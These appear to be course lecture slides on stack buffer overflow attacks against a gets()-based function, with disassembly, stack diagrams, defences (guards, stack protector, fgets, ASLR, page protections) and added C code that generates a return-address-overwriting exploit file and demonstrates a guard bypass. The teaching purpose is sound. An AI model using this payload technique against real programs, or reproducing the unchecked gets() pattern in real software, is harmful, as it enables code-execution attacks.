CS- Spring 18
Buffer Overflow Attacks
Computer Systems 3.10.3-4
Hacking
- Roots in phone phreaking
- White Hat vs Gray Hat vs Black Hat
- Over ...% of modern software development is black hat!
- Tip the balance: be a force for good, not evil!
Disclaimer: Buffer Overflow Attack. DO NOT ABUSE!
- Modern code is protected from this attack in several ways
- An ancient form of hacking: first documented in the 1970s, used in the 1988 Morris Worm, the first Internet worm
- Used to hack Unix, Windows, the Xbox, the PlayStation and the Wii
- Taught here as an example of what to watch out for!
Example: Vulnerable Code

    bool getstring() {
        char buffer[81];
        buffer[0] = '\0';
        gets(buffer);
        if (strlen(buffer) > 0) {
            printf("read line: %s\n", buffer);
            return true;
        }
        return false;
    }

- gets reads from stdin until it finds either an end-of-file or a newline (which is replaced by a null terminator)
- gets copies whatever it reads into its argument (buffer)
- gets does not check that the result fits in the space allocated: there is no way to tell it how big buffer is, so any line longer than 80 characters writes past the end of the array
x86 expansion (objdump -d of getstring; addresses omitted, jump targets shown as labels)

    getstring:
        push   %rbp
        mov    %rsp,%rbp
        sub    $0x60,%rsp              # 0x60 = 96 bytes: the 81-byte buffer rounded up to a multiple of 16
        movb   $0x0,-0x60(%rbp)        # buffer[0] = '\0'
        lea    -0x60(%rbp),%rax
        mov    %rax,%rdi
        callq  <gets@plt>              # gets(buffer)
        lea    -0x60(%rbp),%rax
        movzbl (%rax),%eax
        test   %al,%al                 # strlen(buffer) > 0 reduces to buffer[0] != 0
        je     .Lfalse
        lea    -0x60(%rbp),%rax
        mov    %rax,%rsi
        mov    $...,%edi               # ... = address of the "read line: %s\n" string
        mov    $0x0,%eax
        callq  <printf@plt>
        mov    $0x1,%eax               # return true
        jmp    .Ldone
    .Lfalse:
        mov    $0x0,%eax               # return false
    .Ldone:
        leaveq
        retq
Stack after call to getstring

main calls getstring in a loop:

        while ((gs = getstring())) {};

    loop:
        mov    $0x0,%eax
        callq  <getstring>
        mov    %al,-0x1(%rbp)          # gs
        cmpb   $0x0,-0x1(%rbp)
        jne    loop

The call pushes the return address (the address of the mov after the callq) on top of main's stack frame; %rbp still points into main's frame and %rsp now points at the return address.
(Slide figure: stack table, Address / Value (64 bit) columns, showing main's stack frame with the return address at the top of the stack; %rbp and %rsp marked.)

Stack in getstring after preamble

    getstring:
        push   %rbp                    # save main's %rbp
        mov    %rsp,%rbp
        sub    $0x60,%rsp              # reserve getstring's frame (buffer)
        movb   $0x0,-0x60(%rbp)        # buffer[0] = '\0'

From low to high addresses the stack now holds: buffer (96 bytes, starting at %rsp = %rbp-0x60), main's saved %rbp (8 bytes, at %rbp), the return address (8 bytes, at %rbp+8), then main's stack frame.
(Slide figure: stack table, Address / Value (64 bit), with getstring's stack frame, main's saved %rbp, return address, main's stack frame; %rbp and %rsp marked.)

Stack left to right (little endian)

The same stack drawn as a byte array with addresses increasing left to right, after a normal-length line has been read: "This is ..." appears as its ASCII bytes 54 68 69 73 20 69 73 ... at the start of buffer, followed by main's saved %rbp and the return address. Multi-byte values such as the return address are stored least significant byte first (little endian), so they read "backwards" in this view.
(Slide figure: byte-level diagram with labels main's stack frame, getstring's stack frame, buffer, return@, main's %rbp, Addresses, Values.)
Buffer Overflow
- Put a very long string into an input file
- Much longer than the length of buffer
- So long that it writes over what is past buffer in getstring's frame
  - What is past buffer? main's saved %rbp
- So long that it writes over the lowest address in main's frame!
  - What is in the lowest address in main's frame? The return address of the call to getstring
String in file (stdin) read by gets

    This is a character string that goes on for a very long distance so that it overflows its buffermainsrbprtaddr

The sentence is exactly 96 characters, so it fills buffer (81 bytes) and the 15 bytes of alignment padding above it. The next 8 characters, "mainsrbp", land on main's saved %rbp; the final "rtaddr" (plus the NUL that gets writes in place of the newline) lands on the return address.
(Slide figure: column ruler with buffer / Alignment Padding / main's bp / Return Address! labels.)

Stack left to right (little endian)
(Slide figure: byte-level diagram, addresses increasing left to right: buffer holds 54 68 69 73 20 69 73 ... ("This is ..."), the saved %rbp slot now reads 0x706272736e69616d ("mainsrbp") and the return address slot 0x0000726464617472 ("rtaddr").)

Stack in getstring after gets

        lea    -0x60(%rbp),%rax
        mov    %rax,%rdi
        callq  <gets@plt>              # gets(buffer)
        lea    -0x60(%rbp),%rax        # if (strlen(buffer) > 0) ...

(Slide figure: Address / Value (64 bit) table. Read as little-endian 64-bit words the buffer starts with 0x2073692073696854 ("This is "); main's saved %rbp slot holds 0x706272736e69616d ("mainsrbp"); the return address slot holds 0x0000726464617472 ("rtaddr").)

Stack in getstring at return

        mov    $0x1,%eax               # return true
        jmp    .Ldone
    .Ldone:
        leaveq                         # %rsp = %rbp; pop %rbp  ->  %rbp = 0x706272736e69616d
        retq                           # pop %rip               ->  %rip = 0x0000726464617472

%rip is now 0x0000726464617472, the ASCII bytes "rtaddr" read as an address. Nothing is mapped there: Segmentation Fault.
(Slide figure: Address / Value (64 bit) table after leaveq/retq, %rsp back in main's frame.)
Mixing Hex and ASCII
- Normally we treat a file as a string of ASCII characters
- In fact, each ASCII character has a hex representation: "This is a charac" is 54 68 69 73 20 69 73 20 61 20 63 68 61 72 61 63
- We can write a program to put non-ASCII hex data in a file (see exmp_mix)
- Use the command od -Ax -t x1z to show both ASCII and hex

Example of a file with ASCII and hex

ASCII representation on the terminal (cat file): the text "This is a character string" followed by the four bytes de ad be ef, which are not ASCII and show up as stray accented characters:

    This is a character stringþ¾ï

Mixed representation (od -Ax -t x1z file):

    000000 54 68 69 73 20 69 73 20 61 20 63 68 61 72 61 63  >This is a charac<
    000010 74 65 72 20 73 74 72 69 6e 67 de ad be ef 0a     >ter string.....<
    00001f

(Slide: screenshot of the mixed file opened in gedit.)
String in file (stdin) read by gets, second attempt

    This is a character string that goes on for a very long distance so that it overflows its buffer

followed by 16 non-ASCII bytes:
- ef be ad de ef be ad de: lands on main's saved %rbp (read back as 0xdeadbeefdeadbeef)
- the 8 little-endian bytes of the address to return to: lands on the return address

Same layout as before: buffer plus alignment padding (96 bytes), then main's bp, then the return address.
(Slide figure: column ruler with buffer / main's bp / Return Address! / Alignment Padding labels.)

Stack left to right (little endian)
(Slide figure: byte-level diagram as before; the saved %rbp bytes now read ef be ad de ef be ad de left to right, i.e. 0xdeadbeefdeadbeef, and the return address holds the chosen address.)

Stack in getstring after gets
(Slide figure: Address / Value (64 bit) table; main's saved %rbp slot contains 0xdeadbeefdeadbeef, the return address slot contains the chosen address, the buffer holds the ASCII text.)

Stack in getstring at return

        mov    $0x1,%eax               # return true
        jmp    .Ldone
    .Ldone:
        leaveq                         # %rbp = 0xdeadbeefdeadbeef
        retq                           # %rip = the chosen address

(Slide figure: Address / Value (64 bit) table after leaveq/retq, %rsp back in main's frame.)

What could be at the return address? Your evil code!
Problems with the Buffer Overflow Attack
- Need to know the offset from buffer to the top of the stack / return @
  - Get that from objdump -d
- Need to mix ASCII with hexadecimal in the input file
  - Can write a program to do that
- The string can't contain a newline (0x0a): gets stops reading there
  - Basic restriction
- Need to know the address of the pirate routine to return to
  - Challenge for project 4
- Hard to return to the conventional flow after the attack
  - return @ has been overwritten: can get the original return@ from objdump -d, or just don't return
  - %rbp has been overwritten, so the top of the caller's stack frame is lost: %rsp points to the bottom of the caller's frame, and we can find its size from objdump -d, or just don't use it
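The steps on the slides above (a filler string that exactly covers buffer and its alignment padding, non-ASCII bytes for main's saved %rbp and the return address, and no 0x0a anywhere in the line) can be turned into a small generator. The following is an added example, not code from the lecture or from project 4. The 96-byte distance from buffer to the saved %rbp is taken from the frame layout on the slides; the return address 0x4006f0 and the 0xdeadbeefdeadbeef marker are hypothetical values standing in for what objdump -d would report for a real target.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Frame layout taken from the slides: the 81-byte buffer is padded to 96
 * bytes, then main's saved %rbp (8 bytes), then the return address (8 bytes). */
#define BUF_TO_RBP   96
#define PAYLOAD_LEN  (BUF_TO_RBP + 8 + 8)          /* 112 bytes */

/* Store a 64-bit value least-significant byte first (x86-64 byte order). */
static void put_le64(uint8_t *dst, uint64_t v) {
    for (int i = 0; i < 8; i++)
        dst[i] = (uint8_t)(v >> (8 * i));
}

/* Build the line gets() will read: printable filler up to the saved %rbp,
 * then the fake saved %rbp, then the address to return to.
 * Returns PAYLOAD_LEN, or 0 if any byte is 0x0a: gets() would stop at that
 * newline and the rest of the payload would never reach the stack. */
size_t build_payload(uint8_t out[PAYLOAD_LEN], uint64_t fake_rbp, uint64_t ret_addr) {
    memset(out, 'A', BUF_TO_RBP);
    put_le64(out + BUF_TO_RBP, fake_rbp);
    put_le64(out + BUF_TO_RBP + 8, ret_addr);
    for (size_t i = 0; i < PAYLOAD_LEN; i++)
        if (out[i] == 0x0a)
            return 0;
    return PAYLOAD_LEN;
}

/* Byte i of the payload, or -1 if the payload is invalid or i out of range. */
int payload_byte(uint64_t fake_rbp, uint64_t ret_addr, size_t i) {
    uint8_t buf[PAYLOAD_LEN];
    if (build_payload(buf, fake_rbp, ret_addr) == 0 || i >= PAYLOAD_LEN)
        return -1;
    return buf[i];
}

/* Write the payload plus a terminating newline to a file, to be used as the
 * target's stdin. gets() replaces that newline with a NUL one byte past the
 * return address, which does not disturb the overwritten values. */
bool write_payload_file(const char *path, uint64_t fake_rbp, uint64_t ret_addr) {
    uint8_t buf[PAYLOAD_LEN];
    if (build_payload(buf, fake_rbp, ret_addr) == 0)
        return false;
    FILE *f = fopen(path, "wb");
    if (f == NULL)
        return false;
    bool ok = fwrite(buf, 1, PAYLOAD_LEN, f) == PAYLOAD_LEN && fputc('\n', f) != EOF;
    return fclose(f) == 0 && ok;
}

int main(void) {
    /* Hypothetical values: 0x4006f0 stands for the address objdump -d would
     * report for the routine to return to; the fake %rbp is an arbitrary marker. */
    if (!write_payload_file("exploit.txt", 0xdeadbeefdeadbeefULL, 0x4006f0ULL))
        return 1;
    puts("wrote exploit.txt; run: ./target < exploit.txt");
    return 0;
}
```

Feed the file to the target with `./target < exploit.txt` and inspect it with `od -Ax -t x1z exploit.txt` as on the earlier slide. The 0x0a check matters in practice: an address such as 0x400a00 contains a newline byte and cannot be delivered through gets at all.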
Address Space Layout Randomization
- ASLR is a feature introduced to prevent things like buffer overflow attacks
- Randomizes where your code is loaded: every time you execute, your function is loaded at a different address
- Hence objdump no longer gives you the complete runtime address, just the last three hex digits: randomization works in whole pages, so only the 12-bit offset within the page is predictable
- ASLR will prevent returning to a different function in the same code: the function's instructions are at a different place each run
- gdb turns off ASLR: code is always loaded at the same fixed address (0x...)
- To turn off ASLR on LDAP: setarch linux64 -R <command>
Preventing Buffer Overflow w/ Guard

    bool getstring() {
        struct bufstr {
            char buffer[81];
            unsigned int guard;
        } buf = { {0}, 0xfedcba98 };
        gets(buf.buffer);
        if (strlen(buf.buffer) > 0) {
            assert(buf.guard == 0xfedcba98);
            printf("read line: %s\n", buf.buffer);
            return true;
        }
        return false;
    }

- guard goes in the stack frame after (on top of) buffer; putting both in a struct pins that order, since the compiler is free to rearrange separate locals
- If a buffer overflow occurs, guard will be modified
- If a buffer overflow occurs, the assert will fail (assert is compiled out with -DNDEBUG, so a release build would not check)
- Unless the hacker did objdump and put the guard value in his hacked file
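To watch the guard do its job without smashing a real stack, the following added example (not from the lecture) reproduces the slide's struct and simulates gets with an unchecked memcpy of a constructed line into it; it also shows the bypass the last bullet describes. The guard offset of 84 is what gcc produces for this struct on x86-64 and is computed with offsetof rather than assumed.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define GUARD_VALUE 0xfedcba98u

/* Same idea as the slide: the guard sits in memory right after the buffer,
 * between it and the saved %rbp / return address. A struct is used because C
 * guarantees member order; separate locals may be reordered by the compiler. */
struct bufstr {
    char buffer[81];
    uint32_t guard;            /* offset 84: 3 bytes of alignment padding precede it */
};

/* Simulates an unchecked read of n bytes into the buffer, which is what gets()
 * does. The copy is capped at the struct size only so the demonstration stays
 * inside one object; the guard is still clobbered as soon as n reaches it.
 * Returns true if the guard survived, i.e. the assert() on the slide passes. */
static bool fill_and_check(const unsigned char *line, size_t n) {
    struct bufstr b;
    memset(&b, 0, sizeof b);
    b.guard = GUARD_VALUE;
    if (n > sizeof b)
        n = sizeof b;
    memcpy(&b, line, n);       /* deliberately no bounds check, like gets() */
    return b.guard == GUARD_VALUE;
}

size_t guard_offset(void) { return offsetof(struct bufstr, guard); }

/* Feed a line of n filler bytes: the guard is intact for lines that stay
 * within buffer and its padding, and corrupted once the line reaches it. */
bool guard_intact_after(size_t n) {
    unsigned char line[sizeof(struct bufstr)];
    memset(line, 'A', sizeof line);
    return fill_and_check(line, n);
}

/* The bypass named on the slide: an attacker who read the constant out of
 * objdump -d writes it back at the guard's offset, so the check passes even
 * though the line overflowed. A per-process random canary defeats this. */
bool forged_guard_passes(void) {
    unsigned char line[sizeof(struct bufstr)];
    memset(line, 'A', sizeof line);
    uint32_t g = GUARD_VALUE;
    memcpy(line + guard_offset(), &g, sizeof g);   /* same byte order as the struct */
    return fill_and_check(line, sizeof line);
}
```

Lines of up to 84 bytes leave the guard alone (81 bytes of buffer plus 3 bytes of padding); the 85th byte changes it and the check fails. The forged line passes, which is exactly why compiler-generated protection (next slide) uses a value the attacker cannot read from the binary.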
gcc stack guarding
- If you compile with the -fstack-protector flag, gcc will automatically provide stack guards for you: a canary value, chosen at random when the process starts, is placed between the local buffers and the saved %rbp / return address and checked before the function returns
- If gcc's check finds a corrupted stack guard, it prints
      *** stack smashing detected ***: ./target terminated
  and aborts the process
- gcc stack protection is OFF by default on LDAP machines (many distributions turn it on by default; check your compiler's defaults before relying on either behaviour)
Preventing Buffer Overflow w/ fgets

    bool getstring() {
        char buffer[81];
        buffer[0] = '\0';
        fgets(buffer, sizeof(buffer), stdin);
        if (strlen(buffer) > 0) {
            printf("read line: %s\n", buffer);
            return true;
        }
        return false;
    }

- fgets reads from any stream (third parameter)
- fgets reads until EITHER a newline (0x0a) OR size-1 characters (second parameter) have been stored, then adds the null terminator
- fgets therefore cannot write past the end of buffer
- Two differences from gets to keep in mind: the newline, if read, is kept in buffer (so an empty line still has strlen 1 and the %s above prints it), and a line longer than 80 characters is not discarded, its remainder is returned by the next call
Preventing w/ Memory Protection
- Your entire address space is divided into 4096-byte pages; 4096 = 2^12, so it takes 12 bits, or 3 hex digits, to count from 0 to 4095
- 64-bit addresses: the first 52 bits (13 hex characters) are the page number
- 64-bit addresses: the last 12 bits (3 hex characters) are the offset within the page
- Each page in memory has three independent security attributes:
  - Can I read memory in this page?
  - Can I write memory in this page?
  - Can I execute instructions in this page?
- If you try to perform an action on a page which is not allowed, you get a segmentation violation
Default Memory Protection
- When your code is loaded into memory, it is loaded in pages that allow read and execute, but not write
- Pages in the stack allow read or write, but not execution
- Pages on the heap (malloc'd space) allow read or write, but not execution
- There are library routines to modify the memory protection of a page (mprotect on Unix), but by default there is no memory you are allowed to both write to and execute from
- If your evil code is not already loaded, it's hard to execute it!
- Project 4 has special code to avoid this problem!